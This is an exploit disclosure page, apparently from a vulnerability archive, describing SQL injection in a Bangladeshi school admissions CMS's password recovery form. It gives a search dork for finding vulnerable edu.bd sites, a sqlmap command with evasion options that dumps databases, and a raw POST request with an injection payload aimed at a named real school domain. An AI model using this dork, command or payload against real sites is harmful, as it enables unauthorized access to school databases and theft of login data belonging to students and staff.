Bangladesh EDU CMS SQL Injection => Recovery Login Info

2020.06.27
tr blackh4wk (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title : Bangladesh EDU SQL Injection => Recovery Login Info # Google Dork : inurl:/admission/recovery/ site:edu.bd # Exploit Author : blackh4wk # Date : 2020-06-27 # Tested On : windows 10, Firefox # Category : webapps sqlmap.py -r post.txt -p birth_reg --random-agent --tamper="randomcase.py" --batch --dbs HTTP REQUEST : POST /admission/recovery/ HTTP/1.1 Content-Length: 42 Content-Type: application/x-www-form-urlencoded Referer: https://akkelpurghs.edu.bd/ Cookie: PHPSESSID=cp38c6i36a6qdli3l1gr5c4pj5 Host: akkelpurghs.edu.bd Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* submit=&birth_reg=1'%22&mobile=987-65-4329 POST SQL Command -> submit=&birth_reg=1'%22&mobile=987-65-4329 *********************************************************************** Twitter : @rooterh4wk Discord : blackh4wk#8991 ***********************************************************************


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top